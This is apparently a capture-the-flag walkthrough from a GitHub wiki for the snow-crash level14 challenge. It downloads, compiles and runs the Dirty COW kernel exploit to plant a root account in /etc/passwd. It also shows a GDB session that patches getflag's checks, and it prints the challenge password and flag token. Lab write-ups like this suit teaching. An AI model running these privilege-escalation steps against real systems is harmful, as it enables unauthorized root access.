Level14 Dirty COW - 42lan/snow-crash GitHub Wiki
Login as level14.
โโโ$ [~/42/2021/snow-crash]
โโ> ssh 192.168.1.64 -p 4242 -l level14
[email protected]'s password: 2A31L79asukciNyi8uppkEuSxThere is no file or binary to exploit in home directory. Search for what can be exploit.
level14@SnowCrash:~$ uname -a
Linux SnowCrash 3.2.0-89-generic-pae #127-Ubuntu SMP Tue Jul 28 09:52:21 UTC 2015 i686 i686 i386 GNU/LinuxLinux kernel < 4.8.3 (created before 2018) are vulnerable to Dirty COWยน.
Dirty COW allows privilege escalation by exploiting race condition on the copy-on-write mechanism.
level14@SnowCrash:~$ cd /tmp/
level14@SnowCrash:/tmp$ wget https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c
level14@SnowCrash:/tmp$ gcc -pthread dirty.c -o dirty -lcrypt
level14@SnowCrash:/tmp$ ./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: <Enter>
Complete line:
firefart:figsoZwws4Zu6:0:0:pwned:/root:/bin/bash
mmap: b7fda000
madvise 0
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password ''.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password ''.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwdLogin as root.
level14@SnowCrash:/tmp$ su firefart
Password: <Enter>Login as flag14 and get the flag.
firefart@SnowCrash:/tmp# su flag14
Congratulation. Type getflag to get the key and send it to me the owner of this livecd :)
flag14@SnowCrash:~$ getflag
Check flag.Here is your token : 7QiHafiNa3HVozsaXkawuYrTstxbpABHD8CPnHJAnother solution using GDB by vsaltel
level14@SnowCrash:~$ gdb /bin/getflag
GNU gdb (Ubuntu/Linaro 7.4-2012.04-0ubuntu2.1) 7.4-2012.04
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://bugs.launchpad.net/gdb-linaro/>...
Reading symbols from /bin/getflag...(no debugging symbols found)...done.
(gdb) break main
Breakpoint 1 at 0x804894a
(gdb) run
Starting program: /bin/getflag
Breakpoint 1, 0x0804894a in main ()
(gdb) break *0x0804898e
Breakpoint 2 at 0x804898e
(gdb) continue
Continuing.
Breakpoint 2, 0x0804898e in main ()
(gdb) set $eax=0
(gdb) until
0x08048990 in main ()
(gdb) until
0x080489a8 in main ()
(gdb) break *0x080489b4
Breakpoint 3 at 0x80489b4
(gdb) continue
Continuing.
Breakpoint 3, 0x080489b4 in main ()
(gdb) until
0x080489b6 in main ()
(gdb) until
0x080489ea in main ()
(gdb) break *0x080489fe
Breakpoint 4 at 0x80489fe
(gdb) continue
Continuing.
Breakpoint 4, 0x080489fe in main ()
(gdb) until
0x08048a00 in main ()
(gdb) until
0x08048a34 in main ()
(gdb) break *0x08048a4c
Breakpoint 5 at 0x8048a4c
(gdb) continue
Continuing.
Breakpoint 5, 0x08048a4c in main ()
(gdb) until
0x08048a51 in main ()
(gdb) until
0x08048e88 in main ()
(gdb) break *0x08048ea5
Breakpoint 6 at 0x8048ea5
(gdb) continue
Continuing.
Breakpoint 6, 0x08048ea5 in main ()
(gdb) break *0x8048a89
Breakpoint 7 at 0x8048a89
(gdb) continue
Continuing.
Breakpoint 7, 0x08048a89 in main ()
(gdb) break *0x08048a9d
Breakpoint 8 at 0x8048a9d
(gdb) continue
Continuing.
Breakpoint 8, 0x08048a9d in main ()
(gdb) break *0x08048aae
Breakpoint 9 at 0x8048aae
(gdb) continue
Continuing.
Breakpoint 9, 0x08048aae in main ()
(gdb) print 0x10 + $esp # Get the address to where set the value
$1 = (void *) 0xbffff630
(gdb) set *0xbffff630=0xff # Set the value on 0x10 + $esp
(gdb) break *0x08048acd
Breakpoint 10 at 0x8048acd
(gdb) continue
Continuing.
Breakpoint 10, 0x08048acd in main ()
(gdb) set $eax=1
(gdb) break *0x08048b0a
Breakpoint 11 at 0x8048b0a
(gdb) continue
Continuing.
Breakpoint 11, 0x08048b0a in main ()
(gdb) set $eax=3014
(gdb) continue
Continuing.
Check flag.Here is your token : 7QiHafiNa3HVozsaXkawuYrTstxbpABHD8CPnHJ
[Inferior 1 (process 3417) exited normally]